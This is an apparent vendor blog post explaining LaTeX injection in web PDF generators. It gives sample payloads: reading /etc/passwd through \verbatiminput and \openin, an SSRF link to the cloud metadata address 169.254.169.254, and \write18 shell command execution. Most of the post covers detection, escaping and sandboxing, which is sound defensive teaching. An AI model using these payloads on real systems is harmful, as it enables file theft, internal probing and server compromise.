What is LaTeX Injection? Ways to Exploit, Examples and Impact

Discover how LaTeX injection allows attackers to read files and execute commands. Learn to secure your PDF generation tools with this technical guide.

What is LaTeX Injection? Ways to Exploit, Examples and Impact

In the world of web application security, we often focus on common vulnerabilities like SQL Injection or Cross-Site Scripting (XSS). However, as applications become more specialized, so do the attack vectors. LaTeX injection is a critical yet often overlooked vulnerability that arises when web applications use the LaTeX typesetting system to generate PDFs or images from user-supplied input. If not properly sanitized, this input can allow an attacker to read sensitive files, perform internal network requests, or even execute arbitrary commands on the server.

Understanding the Basics of LaTeX

Before diving into the injection aspect, it is essential to understand what LaTeX is. LaTeX is a high-quality typesetting system used primarily for the production of technical and scientific documentation. Unlike a standard word processor, LaTeX is a markup language. Users write plain text interspersed with commands that describe the structure and meaning of the document, which a compiler (like pdflatex or xelatex) then processes into a formatted document, usually a PDF.

Because LaTeX is incredibly powerful and extensible, it includes features for file handling, mathematical rendering, and even system-level interactions. When a web application—such as an academic paper generator, a CV builder, or a math formula renderer—takes user input and embeds it directly into a LaTeX template, it opens the door for an attacker to inject their own LaTeX commands. This is the core of a LaTeX injection attack.

How LaTeX Injection Works

LaTeX injection occurs when the boundary between data and code is blurred. A typical vulnerable workflow looks like this:

  1. A user provides input via a web form (e.g., a name for a certificate or a mathematical formula).
  2. The application inserts this input into a .tex file template.
  3. The application calls a system command like pdflatex document.tex to generate a PDF.
  4. The resulting PDF is served to the user.

If the application does not filter out special LaTeX characters (like \, {, }, or $), an attacker can break out of the intended context. For example, if the template is \textbf{USER_INPUT}, and the user provides }\textit{injected, the resulting code becomes \textbf{}\textit{injected}, changing the document's structure. While this example is cosmetic, more dangerous commands can lead to severe security breaches.

Types of LaTeX Injection Exploits

Exploitation of LaTeX injection generally falls into three categories: Information Disclosure, Server-Side Request Forgery (SSRF), and Remote Code Execution (RCE).

1. Information Disclosure (Arbitrary File Read)

This is the most common result of a successful LaTeX injection. LaTeX has built-in commands to include the contents of other files. If an attacker can inject these commands, they can force the server to include sensitive files like /etc/passwd or application configuration files directly into the generated PDF.

Example Payload:
To read a file, an attacker might use the \input or \include commands. However, these often fail if the file contains special characters that LaTeX tries to interpret. A more robust method uses the verbatim package:

\usepackage{verbatim}
\verbatiminput{/etc/passwd}

If the verbatim package isn't available, an attacker can use the primitive \read command to read a file line by line:

\newread\file
\openin\file=/etc/passwd
\read\file to\line
\line
\closein\file

2. Server-Side Request Forgery (SSRF)

Many LaTeX distributions include packages that can fetch resources from the internet or local network. The hyperref package, for instance, is often used to create clickable links but can also be abused to make the server perform HTTP requests.

Example Payload:
Using the \url or \href commands, an attacker can attempt to probe internal services or access cloud metadata services (like AWS's 169.254.169.254).

\usepackage{hyperref}
\href{http://169.254.169.254/latest/meta-data/local-hostname}{Click here}

If the server renders the link and the attacker can see the PDF output, they might gain information about the internal network environment.

3. Remote Code Execution (RCE)

The most dangerous form of LaTeX injection involves the \write18 command. This command allows LaTeX to execute shell commands. By default, most modern distributions disable this feature or restrict it to a small list of safe commands. However, if the --shell-escape flag is enabled during compilation, the server is completely compromised.

Example Payload:
An attacker can use \write18 to execute any system command and redirect the output to a file, which they then read using the file disclosure techniques mentioned earlier.

\immediate\write18{id > output.txt}
\input{output.txt}

Even if --shell-escape is disabled, sometimes --os-shell-escape or other configurations might be vulnerable, or older versions of LaTeX packages might have their own command execution vulnerabilities.

Detecting LaTeX Injection

To identify if an application is vulnerable, security researchers look for entry points that lead to PDF generation. Common indicators include:

  • Form fields that accept mathematical notation (like LaTeX or MathJax).
  • Features that generate "Official" documents, reports, or invoices.
  • URL parameters that seem to influence the layout of a generated document.

Testing starts with simple characters to see if they cause a compilation error. If sending a single $ or \ results in a "Server Error" or a failed PDF generation, it suggests the input is being processed by a LaTeX engine without proper escaping. From there, testers attempt to close the current command and start a new one, much like testing for SQL injection.

Real-World Impact

The impact of LaTeX injection depends heavily on the server's configuration. In a worst-case scenario where the LaTeX engine runs with high privileges and shell escape enabled, an attacker gains full control over the web server. This allows for data exfiltration, installation of backdoors, and lateral movement within the corporate network.

Even in restricted environments, the ability to read local files is devastating. An attacker could read the application's source code, discover database credentials, or steal environment variables. Because PDF generation is often a background task, these injections can sometimes bypass traditional Web Application Firewalls (WAFs) that are not configured to inspect for LaTeX-specific syntax.

Mitigation and Prevention Strategies

Securing an application against LaTeX injection requires a defense-in-depth approach. You cannot rely on a single solution; instead, you must combine multiple layers of security.

Input Sanitization and Escaping

The first line of defense is to escape all user input before it reaches the LaTeX template. In LaTeX, several characters have special meanings and must be escaped with a backslash. These include:

  • Backslash (\)
  • Curly braces ({, })
  • Dollar sign ($)
  • Percent sign (%)
  • Ampersand (&)
  • Underscore (_)
  • Hash (#)
  • Tilde (~)
  • Caret (^)

Instead of writing your own regex, use established libraries designed for LaTeX escaping. However, remember that escaping is often insufficient for complex templates, as an attacker might still find ways to use allowed commands maliciously.

Hardening the LaTeX Environment

Configuration is the most critical part of preventing RCE and SSRF.

  1. Disable Shell Escape: Ensure that the --shell-escape or --enable-write18 flags are never used. Use --no-shell-escape explicitly.
  2. Use Restricted Mode: Most modern TeX distributions (like TeX Live) have a "restricted" mode enabled by default, which only allows a very limited set of safe programs to be run.
  3. Filesystem Permissions: Run the LaTeX compiler as a low-privileged user. Use a dedicated user account that has no access to sensitive directories like /etc, /var/www, or .ssh.

Sandboxing and Containerization

The most effective way to mitigate the impact of a successful injection is to isolate the compilation process.

  • Docker Containers: Run the PDF generation inside a short-lived Docker container. Mount only the necessary template files as read-only and use a non-root user.
  • Chroot/Jail: Use chroot or tools like nsjail or bubblewrap to create a highly restricted environment where the compiler cannot see the rest of the system's files or access the network.

Use Safer Alternatives

If you only need to render mathematical formulas, consider using client-side libraries like MathJax or KaTeX. These render formulas in the user's browser using JavaScript and CSS, completely removing the server-side LaTeX engine from the equation and eliminating the risk of server-side injection.

Conclusion

LaTeX injection is a sophisticated vulnerability that highlights the dangers of passing untrusted data to complex system utilities. While LaTeX is an invaluable tool for document production, its power is a double-edged sword. By understanding the mechanics of how commands like \input and \write18 can be abused, developers can implement robust sanitization and sandboxing techniques to protect their infrastructure.

As organizations continue to automate document workflows, the importance of securing these internal engines grows. Regular security audits, dependency updates, and strict input validation are essential components of a modern security posture. Monitoring your infrastructure for unusual file access patterns or unexpected outbound network connections can also help detect exploitation attempts in real-time.

To proactively monitor your organization's external attack surface and catch exposures before attackers do, try Jsmon.